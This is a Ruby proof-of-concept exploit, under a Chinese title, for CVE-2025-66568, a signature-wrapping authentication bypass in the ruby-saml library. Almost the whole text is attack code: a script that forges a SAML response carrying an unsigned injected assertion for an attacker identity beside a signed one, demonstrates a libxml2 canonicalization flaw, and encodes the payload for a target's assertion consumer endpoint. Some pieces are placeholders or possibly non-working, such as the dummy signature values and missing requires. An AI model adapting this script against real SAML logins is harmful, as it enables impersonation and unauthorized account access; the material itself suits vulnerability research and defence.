CVE-2025-66568 ruby-saml库签名包装攻击导致身份验证绕过漏洞

#!/usr/bin/env ruby # CVE-2025-66568 Signature Wrapping Attack PoC for ruby-saml # This PoC demonstrates the vulnerability where libxml2 canonicalization # returns empty string for invalid XML, leading to authentication bypass require 'nokogiri' require 'xmlsec' class SAMLSignatureWrappingExploit def initialize @target_url = 'https://vulnerable-app/saml/acs' @attacker_id = '[email protected]' end # Generate malicious SAML Response with signature wrapping def generate_malicious_saml_response saml_response = <<-XML <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_#{SecureRandom.uuid}" Version="2.0" IssueInstant="#{Time.now.utc.iso8601}"> <saml:Issuer>https://idp.example.com</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <!-- Original signed assertion (will be ignored) --> <saml:Assertion ID="valid_assertion"> <saml:Issuer>https://idp.example.com</saml:Issuer> <saml:Subject> <saml:NameID>[email protected]</saml:NameID> </saml:Subject> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#valid_assertion"> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>BASE64_ENCODED_DIGEST</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>BASE64_SIGNATURE</ds:SignatureValue> </ds:Signature> </saml:Assertion> <!-- Wrapped assertion (actual content executed) --> <saml:Assertion ID="malicious_assertion"> <saml:Issuer>https://idp.example.com</saml:Issuer> <saml:Subject> <saml:NameID>#{@attacker_id}</saml:NameID> </saml:Subject> <saml:Conditions NotBefore="#{Time.now.utc.iso8601}" NotOnOrAfter="#{(Time.now + 3600).utc.iso8601}"/> <saml:AuthnStatement AuthnInstant="#{Time.now.utc.iso8601}"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </samlp:Response> XML saml_response end # Demonstrate the canonicalization issue def demonstrate_canonicalization_bug # Invalid XML that causes libxml2 to return empty string malformed_xml = <<-XML <root xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:Reference URI="#target"> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue/> </ds:Reference> </ds:SignedInfo> </ds:Signature> <content id="target">Original</content> <!-- Injection point for signature wrapping --> <content id="target">Injected</content> </root> XML doc = Nokogiri::XML(malformed_xml) signed_info = doc.at_xpath('//ds:SignedInfo', ds: 'http://www.w3.org/2000/09/xmldsig#') # This may return empty string due to the bug canonicalized = XmlSec.canonicalize(signed_info) puts "Canonicalized result: '#{canonicalized}'" puts "Length: #{canonicalized.length}" puts "Bug demonstrated: canonicalization returned empty/incorrect result" canonicalized end def exploit puts "[*] CVE-2025-66568: ruby-saml Signature Wrapping Attack" puts "[*] Target: #{@target_url}" puts "\n[1] Generating malicious SAML response..." saml_response = generate_malicious_saml_response puts "\n[2] Demonstrating canonicalization bug..." demonstrate_canonicalization_bug puts "\n[3] Sending malicious SAML response..." # In real attack, encode and send to SAML ACS endpoint encoded_response = Base64.strict_encode64(saml_response) puts "[*] Encoded SAMLResponse: #{encoded_response[0..50]}..." puts "\n[!] Attack completed - Attacker can authenticate as: #{@attacker_id}" end end # Run the PoC exploit = SAMLSignatureWrappingExploit.new exploit.exploit if __FILE__ == $0